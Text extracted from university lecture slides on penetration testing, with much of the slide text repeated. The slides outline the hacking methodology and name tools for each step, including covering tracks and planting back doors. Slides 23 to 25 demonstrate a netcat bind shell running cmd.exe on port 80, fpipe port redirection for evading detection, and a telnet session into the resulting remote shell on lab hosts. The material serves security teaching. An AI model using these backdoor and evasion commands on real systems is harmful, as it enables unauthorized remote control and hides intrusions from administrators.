1cs691 chow

C. Edward ChowC. Edward Chow

Penetrate Testing Penetrate Testing

2cs691 chow

Outline of The TalkOutline of The Talk

Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack Framework for penetration studies Skills and Requirements of a Penetration Tester SAN list of Security Holes Internet Penetration Dial up Penetration Internal Penetration References:

Chapter 23 Vulnerability Analysis, by Matt Bishop. Hack I.T, Security Through Penetration Testing, by T.J.

Klevinksy, Scott Laliberte, Ajay Gupta. Hacking Exposed, by Stuart McClure, Joel Scambray and

George Kurtzhttp://www.hackingexposed.com/win2k/links.html

3cs691 chow

DefinitionDefinition

Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.

Using the failure of the system to violate the site security policy is called exploiting the vulnerability

Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.

Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.

Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.

It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence.

Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects.

What is the difference between penetration testing and hacking/intrusion?

Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.

Using the failure of the system to violate the site security policy is called exploiting the vulnerability

Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.

Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.

Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.

It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence.

Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects.

What is the difference between penetration testing and hacking/intrusion?

4cs691 chow

More Thorough Penetration StudyMore Thorough Penetration Study

A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implemenation.

A simple list of vulnerabilities , although helpful in closing those specific holes, contribute far less to the security of a system.

In practice, constrains (resource, money, time) affect the penetration study

A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implemenation.

A simple list of vulnerabilities , although helpful in closing those specific holes, contribute far less to the security of a system.

In practice, constrains (resource, money, time) affect the penetration study

5cs691 chow

Hacking Methodology

(Steps)

Hacking Methodology

(Steps) An excellent

description inside of the back cover page of “Hacking Exposed” text by McClure et al.

An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al.

Scanning

Footprinting

Enumeration

Gaining Access

Escalating Privilege

Pilferting

Covering Tracks

Creating Back Doors

Denial of Service

whois, nslookup

Nmap, fping

dumpACL, showmountlegion, rpcinfo

Tcpdump, LophtcrackNAT

Johntheripper, getadmin

Rhosts, userdataConfig files, registry

zap, rootkits

Cron,at, startup foldernetcat, keystroke logger

remote desktop

Synk4, ping of deathtfn/stacheldraht

6cs691 chow

FootprintingFootprinting Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range

Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others

instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of).

Defense: deploy NIDS (snort), RotoRouter

Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range

Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others

instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of).

Defense: deploy NIDS (snort), RotoRouter

Techniques Open Source search

Find domain name, admin, IP addresses name servers

DNS zone transfer

Tools Google, search engine, Edgar

Whois

(Network solution; arin)

Nslookup (ls –d)digSam Spade

7cs691 chow

ScanningScanning Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet

sending and randomize the ports or IP addresses to be scanned in the sequence.

Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example.

Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet

sending and randomize the ports or IP addresses to be scanned in the sequence.

Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example.

Techniques Ping sweep TCP/UDP port scan

OS detection

Tools Fping, icmpenumWS_Ping ProPack

nmap

NmapSuperscan

fscan

Nmapqueso

siphon

8cs691 chow

EnumerationEnumeration

Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step.

Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step.

Techniques list user accounts

list file shares identify applications

Tools Null sessions

DumpACL

Sid2usreonSiteAdmin

Showmount

NAT

legion

Banner grabing with telnet or netcat, rpcinfo

9cs691 chow

Gaining AccessGaining Access

Based on the information gathered so far, make an informed attempted to access the target.

Based on the information gathered so far, make an informed attempted to access the target.

Techniques

Password eavesdropping

File share brute forcing

Password

File grab

Bufferoverflow

Tools Tcpdump/ssldumpL0phtcrackreadsmb

NATlegion

Tftp

Pwddump2(NT)

Ttdb, bindIIS .HTR/ISM.DLL

10cs691 chow

Escalating PrivilegeEscalating Privilege

If only user-level access was obtained in the last step, seek to gain complete control of the system.

If only user-level access was obtained in the last step, seek to gain complete control of the system.

Techniques Password cracking Known Exploits

Tools John the ripperL0phtcrack

Lc_messages,

Getadmin,sechole

11cs691 chow

PilferingPilfering

Webster's Revised Unabridged Dictionary (1913) Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF.

pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.

Gather info on identify mechanisms to allow access of trusted systems.

Techniques Evaluate Trusts Search for cleartext passwords

Tools rhostsLSA secrets

User data, Configuration filesRegistry

12cs691 chow

Covering TracksCovering Tracks

Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.

Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.

Techniques Clear Logs Hide tools

Tools Zap, Event Log GUI Rootkitsfile streaming

13cs691 chow

Creating Back DoorsCreating Back Doors

Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.

Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.

Techniques Create rogue user accounts

Schedule batch jobs

Infect startup files

Tools Members of wheel, admin

Cron, AT rc, startup folder, registry keys

Techniques Plant remote control services

Install monitoring mechanisms

Replace appls with Trojans

Tools Netcat, remote.exe

VNC, B02Kremote desktop

Keystroke loggers, add acct. to secadmin mail aliases

Login, fpnwcint.dll

14cs691 chow

Denial of ServicesDenial of Services

If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

Techniques Syn flood ICMP techniques Identical src/dst SYN requests

Tools synk4 Ping to deathsmurf

Land

Latierra

Techniques Overlapping fragment/offset bugs

Out of bounds TCP options (OOB)

DDoS

Tools Netcat, remote.exe

VNC, B02Kremote desktop

Keystroke loggers, add acct. to secadmin mail aliases

Trinoo

TFNstacheldraht

15cs691 chow

Nessus: Integrated Security Scanning Tool

Nessus: Integrated Security Scanning Tool

Originally designed by Renaud Deraison Available at www.nessus.org Main scanning engine running on Unix server with client

GUI running on Unix or Windows. Pretty good control and reporting. Include a script language for plug-in (detecting

additional attacks). http://www.nessus.org/pres/bh2001/index.html

16cs691 chow

17cs691 chow

18cs691 chow

19cs691 chow

20cs691 chow

21cs691 chow

22cs691 chow

Setting up Backdoor ConnectionSetting up Backdoor Connection

Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)

Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall.

We will use netcat and fpipe to illustrate the concept. Netcat is available at

http://www.atstake.com/research/tools/network_utilities/ Fpipe is available at http://www.foundstone.com

Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)

Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall.

We will use netcat and fpipe to illustrate the concept. Netcat is available at

http://www.atstake.com/research/tools/network_utilities/ Fpipe is available at http://www.foundstone.com

23cs691 chow

Setup NetcatSetup Netcat

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63

listening on [128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on

[128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu Here we bind in front of port 80. You can also use port 139. The

idea is used known port to avoid detection. -L is used to repeat previous command after connection is

terminated. The nc command will receive command from packet to port 80, and

run it with cmd.exe and send back execution result.

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63

listening on [128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on

[128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu Here we bind in front of port 80. You can also use port 139. The

idea is used known port to avoid detection. -L is used to repeat previous command after connection is

terminated. The nc command will receive command from packet to port 80, and

run it with cmd.exe and send back execution result.

24cs691 chow

Setup FPIPESetup FPIPE

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63FPipe v2.1 - TCP/UDP port redirector.

Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com

Pipe connected: In: 128.198.162.60:58797 --> 128.198.177.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.177.63:53 Out: 128.198.177.63:53 --> 128.198.177.63:80

Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection.

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63FPipe v2.1 - TCP/UDP port redirector.

Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com

Pipe connected: In: 128.198.162.60:58797 --> 128.198.177.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.177.63:53 Out: 128.198.177.63:53 --> 128.198.177.63:80

Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection.

25cs691 chow

Telnet to the relay hostTelnet to the relay host C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00

Directory of C:\work\cucs\cs522\project

04/29/2003 12:56 PM <DIR> . 04/29/2003 12:56 PM <DIR> .. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps 04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf

C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00

Directory of C:\work\cucs\cs522\project

04/29/2003 12:56 PM <DIR> . 04/29/2003 12:56 PM <DIR> .. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps 04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf

26cs691 chow

Layering of TestsLayering of Tests

1. External attacker with no knowledge of the system.

2. External attacker with access to the system.

3. Internal attacker with access to the system.

1. External attacker with no knowledge of the system.

2. External attacker with access to the system.

3. Internal attacker with access to the system.

27cs691 chow